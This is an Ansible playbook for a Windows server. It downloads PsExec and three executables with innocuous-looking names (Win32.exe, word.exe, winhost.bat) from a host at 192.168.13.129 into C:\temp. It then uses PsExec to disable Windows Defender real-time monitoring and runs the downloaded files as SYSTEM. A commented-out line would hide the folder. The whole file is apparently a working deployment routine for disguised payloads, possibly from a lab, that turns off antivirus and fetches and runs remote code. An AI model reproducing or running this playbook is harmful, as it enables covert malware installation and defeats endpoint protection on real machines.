-
  name: Windows Copy .bat file
  hosts: windows-server
  tasks:
    - name: Creates directory
      win_file:
          path: C:\temp\
          state: directory

    - name: Get Executable from the host
      win_get_url:
        url: 'http://192.168.13.129/temp/{{item}}'
        dest: 'C:\temp\{{item}}'
        force: no
      with_items:
        - PsExec.exe
        - Win32.exe
        - winhost.bat
        - word.exe

    - name:  Exclude Windows
      win_psexec:
        command: '{{ item }}'
        executable: C:\temp\PsExec.exe
        elevated: yes
        nobanner: yes
        system: yes
        interactive: yes
        wait: no
      with_items:
        - powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
        - C:\temp\Win32.exe
        - C:\temp\word.exe
        - C:\temp\winhost.bat
#        - powershell.exe Get-Item 'C:\temp' -Force | foreach { $_.Attributes = $_.Attributes -bor "Hidden" }
